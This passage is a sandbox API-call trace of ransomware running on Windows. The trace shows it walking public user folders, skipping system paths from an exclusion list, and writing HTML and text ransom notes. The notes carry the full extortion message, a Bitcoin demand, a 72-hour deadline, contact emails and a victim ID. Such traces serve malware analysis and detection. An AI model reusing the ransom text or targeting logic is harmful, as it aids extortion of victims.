	[0180.805] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8536e2dd, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8536e2dd, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8536e2dd, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0180.805] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.HTML", lpString2="..") returned 1
	[0180.805] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.HTML", lpString2=".") returned 1
	[0180.806] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\Public\\Music\\" | out: lpString1="C:\\Users\\Public\\Music\\") returned="C:\\Users\\Public\\Music\\"
	[0180.806] lstrcatW (in: lpString1="C:\\Users\\Public\\Music\\", lpString2="HELP_DECRYPT_YOUR_FILES.HTML" | out: lpString1="C:\\Users\\Public\\Music\\HELP_DECRYPT_YOUR_FILES.HTML") returned="C:\\Users\\Public\\Music\\HELP_DECRYPT_YOUR_FILES.HTML"
	[0180.806] lstrlenW (lpString="C:\\Users\\Public\\Music\\HELP_DECRYPT_YOUR_FILES.HTML") returned 50
	[0180.806] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.806] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Music\\HELP_DECRYPT_YOUR_FILES.HTML", cchLength=0x32 | out: lpsz="c:\\users\\public\\music\\help_decrypt_your_files.html") returned 0x32
	[0180.806] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.806] StrStrW (lpFirst="c:\\users\\public\\music\\help_decrypt_your_files.html", lpSrch="help_decrypt_your_files") returned="help_decrypt_your_files.html"
	[0180.806] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85347f83, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x85347f83, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x85347f83, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0180.806] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.TXT", lpString2="..") returned 1
	[0180.806] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.TXT", lpString2=".") returned 1
	[0180.807] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\Public\\Music\\" | out: lpString1="C:\\Users\\Public\\Music\\") returned="C:\\Users\\Public\\Music\\"
	[0180.807] lstrcatW (in: lpString1="C:\\Users\\Public\\Music\\", lpString2="HELP_DECRYPT_YOUR_FILES.TXT" | out: lpString1="C:\\Users\\Public\\Music\\HELP_DECRYPT_YOUR_FILES.TXT") returned="C:\\Users\\Public\\Music\\HELP_DECRYPT_YOUR_FILES.TXT"
	[0180.807] lstrlenW (lpString="C:\\Users\\Public\\Music\\HELP_DECRYPT_YOUR_FILES.TXT") returned 49
	[0180.807] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.807] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Music\\HELP_DECRYPT_YOUR_FILES.TXT", cchLength=0x31 | out: lpsz="c:\\users\\public\\music\\help_decrypt_your_files.txt") returned 0x31
	[0180.807] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.807] StrStrW (lpFirst="c:\\users\\public\\music\\help_decrypt_your_files.txt", lpSrch="help_decrypt_your_files") returned="help_decrypt_your_files.txt"
	[0180.807] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85347f83, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x85347f83, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x85347f83, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0180.807] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0180.808] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0180.808] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Public\\Music" | out: lpString1="C:\\Users\\Public\\Music") returned="C:\\Users\\Public\\Music"
	[0180.808] lstrcatW (in: lpString1="C:\\Users\\Public\\Music", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Music\\*.*") returned="C:\\Users\\Public\\Music\\*.*"
	[0180.808] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.808] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.808] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Public\\Music\\HELP_DECRYPT_YOUR_FILES.TXT") returned 49
	[0180.808] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\public\\music\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.810] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0180.810] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0180.812] CloseHandle (hObject=0x380) returned 1
	[0180.812] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.812] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.813] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0180.814] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0180.814] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\public\\music\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.814] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0180.814] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0180.814] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0180.815] CloseHandle (hObject=0x380) returned 1
	[0180.815] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.815] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.815] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0180.815] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Public\\Music\\HELP_DECRYPT_YOUR_FILES.HTML") returned 50
	[0180.815] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\public\\music\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.817] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0180.817] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0180.819] CloseHandle (hObject=0x380) returned 1
	[0180.819] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.819] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.820] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.820] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0180.821] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.821] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\public\\music\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.821] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0180.821] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.821] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0180.821] CloseHandle (hObject=0x380) returned 1
	[0180.822] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Music\\*.*" (normalized: "c:\\users\\public\\music\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x8536e2dd, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8536e2dd, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0180.822] lstrlenW (lpString="C:\\Users\\Public\\Music\\*.*") returned 25
	[0180.822] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.822] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Music\\*.*", cchLength=0x19 | out: lpsz="c:\\users\\public\\music\\*.*") returned 0x19
	[0180.822] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.822] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="windows") returned 0x0
	[0180.822] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.822] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="boot") returned 0x0
	[0180.823] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.823] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="system volume information") returned 0x0
	[0180.823] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.823] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0180.823] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.823] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="temp") returned 0x0
	[0180.823] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.823] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="program files") returned 0x0
	[0180.824] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.824] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="program files (x86)") returned 0x0
	[0180.824] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.824] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="appdata") returned 0x0
	[0180.824] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.824] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="application data") returned 0x0
	[0180.824] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.824] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="winnt") returned 0x0
	[0180.824] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.824] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="tmp") returned 0x0
	[0180.824] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.825] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="cache") returned 0x0
	[0180.825] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.825] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="temporary internet files") returned 0x0
	[0180.825] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.825] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="webcache") returned 0x0
	[0180.825] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.825] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="inetcache") returned 0x0
	[0180.825] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.825] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="nvidia") returned 0x0
	[0180.825] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.825] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="packages") returned 0x0
	[0180.826] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.826] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="cookies") returned 0x0
	[0180.826] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.826] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="programdata") returned 0x0
	[0180.826] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0180.826] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0180.826] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x8536e2dd, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8536e2dd, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0180.826] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0180.826] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0180.826] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8536e2dd, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8536e2dd, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x854eb79b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0180.826] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85347f83, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x85347f83, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x854eb79b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0180.826] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85347f83, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x85347f83, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x854eb79b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0180.827] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0180.827] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0180.827] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1
	[0180.827] lstrcmpW (lpString1="Pictures", lpString2="..") returned 1
	[0180.827] lstrcmpW (lpString1="Pictures", lpString2=".") returned 1
	[0180.827] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public"
	[0180.827] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\"
	[0180.827] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Pictures" | out: lpString1="C:\\Users\\Public\\Pictures") returned="C:\\Users\\Public\\Pictures"
	[0180.828] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Public\\Pictures" | out: lpString1="C:\\Users\\Public\\Pictures") returned="C:\\Users\\Public\\Pictures"
	[0180.828] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Pictures\\") returned="C:\\Users\\Public\\Pictures\\"
	[0180.828] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\Public\\Pictures\\" | out: lpString1="C:\\Users\\Public\\Pictures\\") returned="C:\\Users\\Public\\Pictures\\"
	[0180.828] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Pictures\\*.*") returned="C:\\Users\\Public\\Pictures\\*.*"
	[0180.828] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\*.*" (normalized: "c:\\users\\public\\pictures\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x8539432d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0180.828] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\*.*") returned 28
	[0180.828] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.828] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Pictures\\*.*", cchLength=0x1c | out: lpsz="c:\\users\\public\\pictures\\*.*") returned 0x1c
	[0180.828] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.836] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="windows") returned 0x0
	[0180.836] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.836] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="boot") returned 0x0
	[0180.836] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.836] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="system volume information") returned 0x0
	[0180.837] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.837] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0180.837] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.837] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="temp") returned 0x0
	[0180.837] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.837] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="program files") returned 0x0
	[0180.837] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.838] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="program files (x86)") returned 0x0
	[0180.838] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.838] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="appdata") returned 0x0
	[0180.838] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.838] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="application data") returned 0x0
	[0180.838] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.838] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="winnt") returned 0x0
	[0180.838] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.839] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="tmp") returned 0x0
	[0180.839] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.839] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="cache") returned 0x0
	[0180.839] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.839] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="temporary internet files") returned 0x0
	[0180.839] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.840] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="webcache") returned 0x0
	[0180.840] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.840] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="inetcache") returned 0x0
	[0180.840] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.840] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="nvidia") returned 0x0
	[0180.840] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.840] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="packages") returned 0x0
	[0180.840] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.841] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="cookies") returned 0x0
